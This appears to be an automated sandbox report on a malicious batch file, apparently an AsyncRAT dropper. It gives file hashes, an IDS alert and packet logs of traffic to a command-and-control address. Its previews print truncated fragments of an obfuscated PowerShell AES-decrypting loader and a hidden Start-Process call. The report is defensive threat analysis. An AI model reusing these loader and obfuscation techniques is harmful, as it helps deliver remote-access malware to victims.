SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.41764985251679
Encrypted:	false
SSDEEP:	6144:Ycifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuNl5+:Ni58NSWIZBk2MM6AFB3o
MD5:	3FC30873019E4F5023BE3A347E48D5CD
SHA1:	2881DD7D3465E0F8E2362324763EFB26B6C4938B
SHA-256:	DA747D9C36F0E0FE106A50AB26BCA0886210C2385B38ABD225CFBC4A52808154
SHA-512:	81D722096D61B572E5EB9CCAA933C435F8FC321007144CA2F656A7E795AF12DE2DFD7F82528F3C6984E9CE7AACA67AE38358BD1213501FC02E491B95318122A4
Malicious:	false
Preview:	regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.E_S.................................................................................................................................................................................................................................................................................................................................................Hg........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.84935141926561
Encrypted:	false
SSDEEP:	3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
MD5:	D8C4F9FD5B972AE487170EA993933179
SHA1:	32E61F1DD8A462CEDC6B7A636275363B011ABDA9
SHA-256:	728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
SHA-512:	1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
Malicious:	false
Preview:	Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (2696), with CRLF line terminators
Category:	dropped
Size (bytes):	2843
Entropy (8bit):	5.269035353896471
Encrypted:	false
SSDEEP:	48:9JFHDR0XRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRIVt7vBpB6a5xY595f8bus3wMVd2
MD5:	7915C0F991D2F46913AA20885C43B072
SHA1:	CBE7D908071C4850DD27BE472C6F84153FCB2418
SHA-256:	B8093E0472DD550EA7EA91B81CBE042DA6D621941514B4E1270AB3A73D1DEA60
SHA-512:	604929EC07DAC7DB18712B2F582223D9D589D5241790FAC881E3D9C7856E8F767DB0819C69E8BE9CD5955DAE2CBBC4165830CB726852517D0794458CA57C17B7
Malicious:	false
Preview:	Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblck

Static File Info

General

File type:	DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
Entropy (8bit):	6.008710946572079
TrID:	BibTeX references (5501/1) 100.00%
File name:	payload.cmd
File size:	5'214'429 bytes
MD5:	19fc666f7494d78a55d6b50a0252c214
SHA1:	8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:	e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
SHA512:	94dde8d5d0100e892ca004556b30b8e8fedacc1e3482dab9d611bd64569b2f73e29da93db2c7ae51585791a4f39d01426ee6663c48602de92aa74f6ebe3f630a
SSDEEP:	49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
TLSH:	8536120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
File Content Preview:	@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T14:55:08.393977+0200	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	154.216.20.132	6969	192.168.2.7	49719	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 14:55:07.692709923 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:07.697782993 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:07.698208094 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:07.705275059 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:07.710414886 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:08.385761976 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:08.385854959 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:08.385921955 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:08.389133930 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:08.393976927 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:08.593889952 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:08.712423086 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:08.900566101 CEST	49720	443	192.168.2.7	195.201.57.90
Oct 3, 2024 14:55:08.900610924 CEST	443	49720	195.201.57.90	192.168.2.7
Oct 3, 2024 14:55:08.900707960 CEST	49720	443	192.168.2.7	195.201.57.90
Oct 3, 2024 14:55:08.901784897 CEST	49720	443	192.168.2.7	195.201.57.90
Oct 3, 2024 14:55:08.901802063 CEST	443	49720	195.201.57.90	192.168.2.7
Oct 3, 2024 14:55:09.756515980 CEST	443	49720	195.201.57.90	192.168.2.7
Oct 3, 2024 14:55:09.756633043 CEST	49720	443	192.168.2.7	195.201.57.90
Oct 3, 2024 14:55:09.760247946 CEST	49720	443	192.168.2.7	195.201.57.90
Oct 3, 2024 14:55:09.760255098 CEST	443	49720	195.201.57.90	192.168.2.7
Oct 3, 2024 14:55:09.760653973 CEST	443	49720	195.201.57.90	192.168.2.7
Oct 3, 2024 14:55:09.765185118 CEST	49720	443	192.168.2.7	195.201.57.90
Oct 3, 2024 14:55:09.811403990 CEST	443	49720	195.201.57.90	192.168.2.7
Oct 3, 2024 14:55:09.957953930 CEST	443	49720	195.201.57.90	192.168.2.7
Oct 3, 2024 14:55:09.958128929 CEST	443	49720	195.201.57.90	192.168.2.7
Oct 3, 2024 14:55:09.958657026 CEST	49720	443	192.168.2.7	195.201.57.90
Oct 3, 2024 14:55:10.027981997 CEST	49720	443	192.168.2.7	195.201.57.90
Oct 3, 2024 14:55:10.206360102 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:10.211241007 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:10.211340904 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:10.216272116 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:10.566605091 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:10.612221956 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:10.725572109 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:10.909044981 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:16.763418913 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:16.764194012 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:16.764661074 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:16.765950918 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:16.766028881 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:16.767138004 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:16.767317057 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:16.790307999 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:16.795267105 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:16.797658920 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:16.802762985 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:19.996496916 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:19.996684074 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:19.996716022 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:19.996783018 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:19.996875048 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.108839989 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.108953953 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.113739014 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.113781929 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.113852978 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.113864899 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.113878965 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.113923073 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.113933086 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.113950014 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.113992929 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.113998890 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.114008904 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.114068985 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.114123106 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.114129066 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.114140987 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.114196062 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.120479107 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120495081 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120505095 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120520115 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120573997 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.120583057 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120623112 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.120635033 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120639086 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120665073 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.120673895 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120712996 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.120723009 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120759010 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120764017 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.120764017 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.120798111 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.120834112 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.120840073 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125396013 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125557899 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125652075 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125737906 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125742912 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125802040 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125808001 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125924110 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.125930071 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126007080 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126072884 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126076937 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126111984 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126115084 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126166105 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126169920 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126182079 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126193047 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126257896 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126261950 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.126271963 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.577446938 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.627815008 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.725735903 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.768042088 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.773052931 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:20.775295019 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:20.780278921 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.149146080 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.205931902 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:21.304039001 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.329385042 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:21.329447985 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:21.334445953 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.334470034 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.334497929 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.334513903 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.334533930 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.334548950 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.334563017 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.334589958 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.334764004 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.559478045 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.612185001 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:21.719580889 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.766365051 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:21.771358967 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:21.771420956 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:21.776302099 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.160094976 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.205944061 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:22.319401979 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.362231970 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:22.433186054 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:22.433186054 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:22.438186884 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.438194990 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.438204050 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.438208103 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.438312054 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.438316107 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.757092953 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.799686909 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:22.914232969 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.938683987 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:22.938728094 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:22.943574905 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.943583012 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:22.943677902 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:23.315753937 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:23.362205982 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:23.486377001 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:23.534138918 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:23.594868898 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:23.599756956 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:23.601700068 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:23.606590033 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:23.978257895 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:24.128132105 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:24.132133961 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:24.172699928 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:24.179887056 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:24.179949999 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:24.187057972 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:24.545924902 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:24.643436909 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:24.694490910 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:24.772770882 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:24.772813082 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:24.777611971 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:24.778146029 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:24.778151989 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.001048088 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.127914906 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:25.163093090 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.207972050 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:25.208039045 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:25.208066940 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:25.212759018 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.212795973 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213018894 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213027954 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213036060 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213044882 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213062048 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213069916 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213079929 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213088036 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213095903 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213113070 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213128090 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213135958 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213144064 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213159084 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213166952 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213229895 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213238001 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213257074 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213270903 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213279009 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.213294983 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.540036917 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.627938032 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:25.694600105 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.722007990 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:25.722438097 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:25.726852894 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.727229118 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.727293968 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.727307081 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.727339029 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:25.948056936 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:26.100847006 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:26.101213932 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:26.234196901 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:26.239197969 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:26.239461899 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:26.244478941 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:26.645200014 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:26.805754900 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:26.806014061 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:26.828233957 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:26.833067894 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:26.833128929 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:26.838059902 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:27.447468042 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:27.447509050 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:27.447577000 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:27.469238997 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:27.474239111 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:27.474317074 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:27.479173899 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:27.863228083 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:27.940402031 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:28.027570009 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:28.047301054 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:28.052335978 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:28.052412033 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:28.057267904 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:28.452189922 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:28.502824068 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:28.600939989 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:28.625551939 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:28.630624056 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:28.630734921 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:28.635571957 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.012336016 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.065319061 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:29.163378000 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.202868938 CEST	49719	6969	192.168.2.7	154.216.20.132
